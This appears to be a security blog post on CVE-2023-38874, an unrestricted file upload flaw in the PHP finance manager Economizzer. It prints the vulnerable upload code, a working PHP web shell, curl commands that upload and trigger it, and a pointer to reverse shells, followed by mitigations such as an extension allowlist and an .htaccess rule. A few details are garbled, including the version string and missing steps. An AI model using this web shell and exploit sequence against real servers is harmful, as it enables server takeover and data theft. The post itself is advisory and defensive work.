A serious security vulnerability has been discovered in Economizzer, an open-source web-based personal finance manager. The issue, tracked as CVE-2023-38874, affects versions up to v..9-beta1 and commit 373088 (from April 2023). Attackers can exploit a weak file upload system to achieve remote code execution (RCE), taking control of the server.
This post explains how the bug works, shows example code, and provides detailed steps for exploitation. Our explanations are straightforward, focusing on practical security knowledge.
What is Economizzer?
Economizzer helps users manage their personal finances online. It's built using PHP and is popular due to its simplicity. It offers features such as adding cashbook entries and attaching documents like receipts.
The Vulnerability, Explained Simply
When a user adds a new cash book entry in Economizzer, the app allows file attachments. This is handy for receipts, but unfortunately, the upload system does not properly restrict file types.
Malicious users can upload a .php file instead of, say, a .jpg. If the attacker later visits the uploaded script in their browser, it will execute on the server! This gives them remote code execution—the ability to fully control the web server as the www-data (web) user.
Where is the Problem in the Code?
In controller/lancamento.php, there's a critical section:
if (!empty($_FILES['comprovante']['name'])) {
$file_name = $_FILES['comprovante']['name'];
$file_tmp = $_FILES['comprovante']['tmp_name'];
move_uploaded_file($file_tmp, "uploads/" . $file_name);
}
Exploit: Step-by-Step Walkthrough
Goal: Upload a PHP web shell and gain control of the server.
Example (shell.php)
<?php
if (isset($_REQUEST['cmd'])) {
system($_REQUEST['cmd']);
}
?>
This lets you execute commands by visiting shell.php?cmd=whoami.
3. Submit the form
The file will be stored in /uploads/shell.php.
4. Trigger the payload
Navigate to:
http://victim-website/uploads/shell.php?cmd=id
5. (Optional) Use more advanced shells
Attackers can upload more powerful shells (like Pentestmonkey's PHP Reverse Shell), set up a listener, and get a fully interactive shell on the server.
Here's what the file upload form looks like (in Economizzer)
Proof-of-Concept (PoC) Code
You can automate the attack with tools like curl or Burp Suite. Here’s a simple curl example:
curl -s -i -X POST http://victim-website/lancamento.php \
-F 'comprovante=@shell.php' \
-F 'other_form_fields=values_here'
Then
curl http://victim-website/uploads/shell.php?cmd=uname -a
Unauthenticated users (if the site is public) can get control.
- A server compromised like this can leak data, mine crypto, send spam, pivot to other internal systems, etc.
For Website Owners
- Upgrade to the latest version of Economizzer if a patch is available (see current releases).
Restrict uploaded file types (allow only images: .jpg, .png, etc.) and verify content.
- Place uploads _outside_ web root or block script execution in the upload folder (e.g., using .htaccess).
Example .htaccess to disallow execution
<FilesMatch "\.php$">
Deny from all
</FilesMatch>
Developers:
Add MIME type and extension checks before saving uploaded files.
$allowed = array('jpg','jpeg','png','pdf');
$ext = strtolower(pathinfo($file_name, PATHINFO_EXTENSION));
if (!in_array($ext, $allowed)) {
die('Invalid file type!');
}
References
- Official CVE Record (CVE-2023-38874)
- Economizzer Source Code
- OWASP File Upload Security Cheat Sheet
Conclusion
CVE-2023-38874 is a classic but critical example of why secure file upload handling matters. If you use Economizzer, patch immediately and review your server for suspicious files in the upload directory. Always treat user-uploaded files as untrusted—especially when coding in PHP!
*Written exclusively for your security awareness. Share with admins, sysadmins, and developers alike!*
Timeline
Published on: 09/28/2023 04:15:12 UTC
Last modified on: 10/02/2023 18:35:07 UTC